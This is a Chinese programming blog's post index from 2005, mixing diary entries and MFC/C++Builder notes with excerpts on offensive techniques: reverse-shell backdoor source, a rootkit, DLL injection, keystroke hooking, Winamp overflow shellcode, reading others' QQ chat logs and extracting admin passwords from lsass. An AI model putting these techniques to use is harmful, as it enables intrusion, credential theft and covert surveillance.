- 博客(38)
- 资源 (6)
- 收藏
- 关注
原创 忙碌一日
办公区交请假条 ,和领导打乒乓球, 和老乡一起去购汽车票, 中午永和吃饭, 购买布娃娃,显示器2250 ,e3100 250 ,下午回来整理, 晚上理发,购干燥器,吃得,光谷书城买英语词典,归,微雨,很冷!晚上洗澡,整理包,到现在3:00 ! 过年前最后一次笔记
2005-02-06 03:03:00 1041
原创 数码相机的奢望
今天突然想买数码相机, 上网看了看,倭寇的东西是坚决不买的,剩下也就柯达了, 初步印象还不错,其中ls753 还有6490以及最新的z740很感兴趣,3000多,呵呵,应该可以搞的定,囊中羞涩啊,:) ,看这个家庭梦想什么时候实现 上午看了看benq液晶的报价, 依然如此,看来只好2250出手购买737s了, 最新的71g 12ms确实看的漂亮,2400可以拿到货 ,不过还是超出预算呢
2005-02-04 23:08:00 1222
原创 糊涂日子
看到原界一章后真是越来越精彩啊,呵呵, 后面越来越让人郁闷,不知道作者怎么搞的, 很有意思,可是出的也未免太慢了... 昨晚鲁巷广场看中一件休闲外套, 本想马上购买, 一想到以前买衣服的经验,大多回去就后悔, 这次学乖了, 呵呵,, 还是找个人参谋好点 ,否则买的回去堆起来, 也是太浪费罗 今早和往常一样睡到11点, 中午匆匆去加了手机和上网费用, 下午把项目的总体架构给负责
2005-02-03 21:32:00 1170 1
原创 同等学历(计算机)综合考试心得
计算机综合考试相对于其他专业通过率比较低,如果想一次就通过必须扎实学习,对于本来专业就是计算机的同志来说,我想3个月的时间比较充足;对于非计算机的而数学功底很好的3个月我想也差不多。为什么我会这么说:首先分析分数的分布:数学40分(其中离散24,组合16);其他两门专业各30分;从分数分布我个人认为:离散24分,根据考试的题型,选择题考得最多的只可能是离散的概念性的东西,离散和组合中都讲到了群,这
2005-02-03 12:39:00 1786 1
原创 文档/视图结构中的各个部分是如何联系到一起的(2)
(三)文档与视图之间的联系在视图类有一个保护数据成员:CDocument* m_pDocument;,这个文档指针指向视图对象所属的文档,视图里常用的函数GetDocument()就是返回的这个指针;在文档类有一个保护数据成员:CDocument* m_viewList;,它保存的是所有正在显示该文档的视图的指针,通过CDocument的成员函数GetFirstViewPosition和Get
2005-02-02 16:46:00 1148
原创 文档/视图结构中的各个部分是如何联系到一起的(1)
文档/视图结构是MFC中最有特色而又有难度的部分,在这当中涉及了应用、文档模板、文档、视图、MDI框架窗口、MDI子窗口等不同的对象,如果不了解这些部分之间如何关联的话,就可能犯错误,也就很难编出有水平的文档/视图程序。比如我在初学VC编程的时候,为应用程序添加了两个文档模板,两个模板公用一个文档类,只是视图不一样,期望当一个模板的文档的视图改变了文档后,调用UpdateAllViews后也能更新
2005-02-02 16:45:00 1216
原创 怎么才能使主界面一启动就隐藏窗口(实用)
对话框 可以在对话框中重载虚函数DefWindowProc()。 LRESULT CMyDlg::DefWindowProc(UINT message, WPARAM wParam, LPARAM lParam) { if(message==133 ) ShowWindow(SW_HIDE); return CDialog::
2005-02-02 16:44:00 1755
转载 转贴]在DLL中使用资源(推荐) (3)
那么如何解决上述问题呢?解决办法就是在适当的时候进行模块状态切换,以保证具有当前状态的模块是我们所需要的模块从而使用正确的资源。MFC提供了下列函数和宏来完成这些工作: AfxGetStaticModuleState:这是一个函数,其函数原型为:AFX_MODULE_STATE* AFXAPI AfxGetStaticModuleState( ); 此函数在堆栈上构造AFX_MODULE_STAT
2005-02-02 16:43:00 1085
转载 转贴]在DLL中使用资源(推荐) (2)
让我们来回顾一下在Win32 DLL中使用对话框的过程。在DLL中,我们定义了两个对话框资源:IDD_DLG_SHOW和IDD_ABOUTBOX,并且导出了函数ShowDlg。在函数ShowDlg之中使用CreateDialog函数创建了非模态对话框IDD_DLG_SHOW,并指定了该对话框的回调函数DlgProc。在DlgProc之中处理了WM_INITDIALOG、WM_COMMA
2005-02-02 16:41:00 1149
转载 转贴]在DLL中使用资源(推荐) (1)
现在最常看见的关于DLL的问题就是如何在DLL中使用对话框,这是一个很普遍的关于如何在DLL中使用资源的问题。这里我们从Win32 DLL和MFC DLL两个方面来分析并解决这个问题。 1.Win32 DLL 在Win32 DLL中使用对话框很简单,你只需要在你的DLL中添加对话框资源,而且可以在对话框上面设置你所需要的控件。然后使用DialogBox或者CreateDialog这两个函数
2005-02-02 16:24:00 1175
原创 解决Windows 程序界面闪烁问题的一些经验
一般的windows 复杂的界面需要使用多层窗口而且要用贴图来美化,所以不可避免在窗口移动或者改变大小的时候出现闪烁。先来谈谈闪烁产生的原因原因一:如果熟悉显卡原理的话,调用GDI函数向屏幕输出的时候并不是立刻就显示在屏幕上只是写到了显存里,而显卡每隔一段时间把显存的内容输出到屏幕上,这就是刷新周期。一般显卡的刷新周期是 1/80秒左右,具体数字可以自己设置的。这样问题就来了,一般
2005-02-02 16:23:00 1471
原创 Debug 和 Release 编译方式的本质区别
Debug 通常称为调试版本,它包含调试信息,并且不作任何优化,便于程序员调试程序。Release 称为发布版本,它往往是进行了各种优化,使得程序在代码大小和运行速度上都是最优的,以便用户很好地使用。Debug 和 Release 的真正秘密,在于一组编译选项。下面列出了分别针对二者的选项(当然除此之外还有其他一些,如/Fd /Fo,但区别并不重要,通常他们也不会引起 Release 版错误,在此
2005-02-02 15:39:00 1717
原创 消息钩子函数入门篇(转载)
消息钩子函数入门篇 Windows系统是建立在事件驱动的机制上的,说穿了就是整个系统都是通过消息的传递来实现的。而钩子是Windows系统中非常重要的系统接口,用它可以截获并处理送给其他应用程序的消息,来完成普通应用程序难以实现的功能。钩子可以监视系统或进程中的各种事件消息,截获发往目标窗口的消息并进行处理。这样,我们就可以在系统中安装自定义的钩子,监视系统中特定事件的发生,完成特定的功能,比如截
2005-02-02 15:35:00 1186
原创 VC6.0编译器参数设置
VC6.0编译器参数的设置主要通过VC的菜单项Project->Settings->C/C++页来完成。我们可以看到这一页的最下面Project Options中的内容,一般如下:/nologo /MDd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_AFXDLL" /D "_MBCS" /Fp"Debug/Writin
2005-02-02 15:25:00 1817 1
原创 利用钩子函数动态汉化外文程序菜单
利用钩子函数动态汉化外文程序菜单 杨山河 引言 当前,英文版的应用程序,一般在中文平台上就相应有中文版。这其中有软件商自己推出的中文语言本地化版本,也有国内或国外的第三方供应商为了市场需要而推出中文版本。后者汉化的方式又分内核汉化和外挂汉化。由于内核汉化涉及到版权等一系列问题,加之源代码设计不一定与中文兼容,因而很少有人采用。因此,在今天的中国,从中文之星到四通立方均采用外挂汉化的方式
2005-02-02 15:24:00 1814
原创 当职业成为一种负担
夜深深, 敲击着硬硬得键盘,听着噼里啪啦的声音 , 潇洒的挥手, 一片文字就通过qq到达了聊友的面前,好久没有进入聊天室了,今天好像特别无聊, 到久违的武大聊天室一看,呵 ,还真人多啊, 但是里面没几个是武大的mm呢, 不小心又碰到职业的话题,每次都让人伤感啊, 如果一种职业让你羞于说出来, 哽咽在喉, 似乎说出来要招致歧视, 蔑视, 那真是一件痛苦的事情.这时候一切解释都似乎那
2005-02-02 00:12:00 1047 1
原创 Windows网络编程经验小结
1. 如果在已经处于 ESTABLISHED状态下的socket(一般由端口号和标志符区分)调用closesocket(一般不会立即关闭而经历TIME_WAIT的过程)后想继续重用该socket:BOOL bReuseaddr=TRUE;setsockopt(s,SOL_SOCKET ,SO_REUSEADDR,(const char*)&bReuseaddr,sizeof(BOOL)
2005-02-01 18:00:00 1084
原创 用BCB拦截Windows消息
---- C++ Builder不愧为Borland公司的优秀产品,用它来开发Windows程序非常快捷高效,但在编程过程中你也会发现它的一些限制性,让你无法实现自己的想法。比如你无法在修改表单的系统菜单;比如使用跟踪栏时,你找不到StartTrack和EndTrack事件,而偏偏你的程序需要这两个事件。Windows API编程中,你就不会有这些麻烦,只需处理一下WM_SYSCOMMAND和WM
2005-02-01 17:50:00 1080
原创 C++Builder如何響應消息及自定義消息
Inprise(Borland) C++Builder中,可以像在Delphi中一樣響應消息,只是看起來要稍複雜一點。 對於系統已定義的消息,可以直接響應: #define WM_MY_OPEN_CMDLINE_FILE (WM_USER+1) //進程間通訊的自定義消息 #define WM_MY_SEARCH_NODE (WM_USER+2) //查找命令的自定義消息 class TSom
2005-02-01 17:15:00 1747
原创 Linux后门技术及实践
Mail:e4gle@whitecell.org Page:http://www.whitecell.org Copyright: Whitecell Security Systems 概述 后门简介 常用后门技术 后门的检测 实例讲解:login后门 后门简介 入侵者完全控制系统后,为方便下次进入 而采用的一种技术。 一般通过修改系统配置文件和安装
2005-02-01 17:14:00 1154
原创 动态链结函式库(DLL-Dynamic Linked Library)
基本上,如果略去VCL软体元件不谈的话,在C++Builder中撰写及使用DLL的方法是和传统Windows SDK是一致的,然而如此一来C++Builder也就失去了它傲人的优势了。因此在本章中我会为你介绍如何撰写使用VCL元件的 DLL,同时也针对各种不同程式发展平台如Visual C++, VB之间的DLL使用上应注意的事项,做一个全面的探讨。 以C++Builder撰写动态链结函式库
2005-02-01 17:12:00 1585
原创 以C++ Builder处理Windows 讯息(Message)
·前言虽然C++Builder为一RAD式的程式发展工具,程式设计师在大多数情况下不需理会Windows讯息的细节,只要将心思放在软体元件的事件处理函式即可。然而由於Windows作业系统终究是一个以讯息驱动的系统,因此架构其上的的应用程式自然无法自外於系统之外,在遭遇到C++Builder没有定义的事件时,Windows讯息处理能力仍然是C++Builder程式人不可或缺的能力。 不可否
2005-02-01 17:11:00 1199
原创 bcb点滴
[BCB] 攔截關機訊息怎麼攔截關機中的狀況來結束應用程式class TForm1 : public TForm{__published: // IDE-managed Componentsprivate: // User declarationspublic: // User declarationsBEGIN_MESSAGE_MAPMESSAGE_HANDLER(WM_QUER
2005-02-01 17:09:00 1853
原创 进行DLL注入的三种方法
作者:陶冶(无邪) MAIL:taoy5178@hotmail.com OICQ:24149877 from:网络技术 在WINDOWS中,每个进程都有自己独立的地址空间,这样一个应用程序就无法进入另一个进程的地址空间而不会破坏另一个进程的运行,这样使得系统更加的稳定。但这样一来,相反的,如果我们要对我们感兴趣的进程进行操作也就变得复杂起来。比如,我们要为另一个进程创建的窗口建立子类或
2005-02-01 16:19:00 1471
原创 BCB 编写 DLL 终极手册
由于现在比较多的网友老是在 CSDN 上询问关于 BCB 编写 DLL 的问题,我编写了这篇文章抛砖引玉 一. 编写 DLL File/New/Dll 生成 Dll 的向导,然后可以添加导出函数和导出类 导出函数:extern "C" __declspec(dllexport) ExportType FunctionName(Parameter) 导出类:class __declspec(d
2005-02-01 16:12:00 1221
原创 模拟WSockExpert,使用APIHOOK
不知道大家用过WSockExpert没有, 它可以用来截获指定进程网络数据的传输.前面我还以为它是通过实时远程注入DLL来更改IAT. 不过后来发现在程序一运行时,它就已经将DLL插入所有进程了,这个跟冰哥写的那个模拟SOCKCAP的程序很相似.似乎是将DLL注入所有进程, 不过再想一下, 如果是这样的话,那么后来启动的程序应该不会被注入DLL(除非用定时^_^,这样就太麻烦了), 考虑到这些,
2005-02-01 15:19:00 3037 2
转载 五个反弹后门的源代码[转]
第一个反弹木马代码:作者 iceblood代码#include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome/n";int sock;int main(int argc, char *argv[]) {if(
2005-02-01 15:17:00 1795
原创 常用函数库收集
unsigned long resolv(char*host){ struct hostent *hp; unsigned long host_ip; host_ip = inet_addr(host); if( host_ip == INADDR_NONE ) {
2005-02-01 11:52:00 1397
原创 Process-wide API spying - an ultimate hack
By Anton Bassov Process-wide API spying. AbstractAPI hooking and spying is not uncommon practice in Windows programming. Development of system monitoring and analysis tools heavily depends upo
2005-02-01 11:51:00 1254
原创 关于HOOK截获中文输入
以前一直没有注意到一个问题,就是用键盘钩子截获字符输入时是截不到特殊字符的,比方说中文输入法之类的.后来用到了消息钩子去HOOK WM_IME_CHAR,这时候大部分已经能够获取了,但是对于其他一些程序,比方说WORD之类的也就不能截获了.后来到MSDN上查到, 要用到WM_IME_COMPOSITION消息,并且在处理该消息时要用到IMM的一些库函数从输入法数据区中获取.比方说ImmGetCon
2005-02-01 11:50:00 1792
原创 Winamp "in_cdda" 模块的调试以及SHELLCODE的编写
作者:ZwelL日期:2004.11.29团队:shadoweyes 上一个星期Brett Moore在BUGTRAG上面公布了WINAMP的溢出漏洞,说在in_cdda模块中存在strack溢出,受影响的系统为5.05和5.06. 后来k-otik又公布了针对该漏洞的messagbox测试,并给出了相关代码。但是在后来的测试中,发现k-otik给出的代码没有试验通过。于是对该漏洞进行了
2005-02-01 11:50:00 1738
原创 QQ2004 sp1加密文件结构和加密算法分析
原文:http://bbs.pediy.com/showthread.php?s=81db34495070105750b05461f05e5c0b&threadid=7933测试确实可以查看本机其他人的聊天记录,其他的没有测试过,大家看看有什么启发不,呵呵 ^_^///////////////////////////////////////////////////////////////////
2005-02-01 11:49:00 1015
原创 获取windows2003系统管理员密码
其实这个方法比较早就发现了,在参加安全焦点峰会之前我写的那一篇关于从内存中抓取密码一文中提到了这个(后来冰哥给面子,做为了备选议题)。当时也是很无心,发现在lsass进程中存放着最近一次登陆的管理员的密码,而且是明文的。不过在其他系统上并没有找到,所以当时也没有发表出来。今天看到 WinEggDrop贴出了代码,写的非常完整,转了过来,大家看看吧。这里面有一点要注意,首先保存的密码是最近一次登陆的
2005-02-01 11:48:00 3093
原创 用户态隐藏进程的通用版本
一般基于HOOK ZwQuerySystemInformation的隐藏进程都是在驱动模式下进行的, 在这里通过操作内存实现了. 而且达到了不同系统版本的通用性. 厉害...来自驱动开发网的东东....比较适合我们这种驱动白痴 ^_^注:在测试过程中.因为是命令行模式,所以在任务管理器的应用程序中看的到, 实际上在进程中已经隐藏了...其他的自己改吧...下面是源代码:#include #incl
2005-02-01 11:47:00 2891 3
原创 BASIC ROOTKIT that hides files, directories, and processes
// BASIC ROOTKIT that hides files, directories, and processes// ----------------------------------------------------------// v0.1 - Initial, Greg Hoglund (hoglund@rootkit.com)// v0.2 - DirEntry struct
2005-02-01 11:46:00 1080
转载 zzzevazzz给出的是好东东
zzzevazzz给出的是好东东,不放上来可惜:改了调用pfnMemcpy处蓝屏的代码.直接调用memcpy. Thank for your share...//************************************************************************// Ring0Demo.c v1.0 by zzzEVAzzz// 目的:演示无驱动执行Ri
2005-02-01 11:33:00 1410
原创 win下实现切换帐号的方法
目前实现的方法有几种:1.CreateProcessWithLogonW() //需要密码2.LogonUser(),CreateProcessAsUser() //也需要密码3.NtCreateToken(),CreateProcessAsUser() //不需要密码1,2外面都有很多工具. 3的话bingle的wsu -f可以实现.不过bingle的wsu只是做了SID的处理, 他切换到gue
2005-02-01 11:20:00 2282 3
UDP协议可靠传输文件
2011-09-14
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人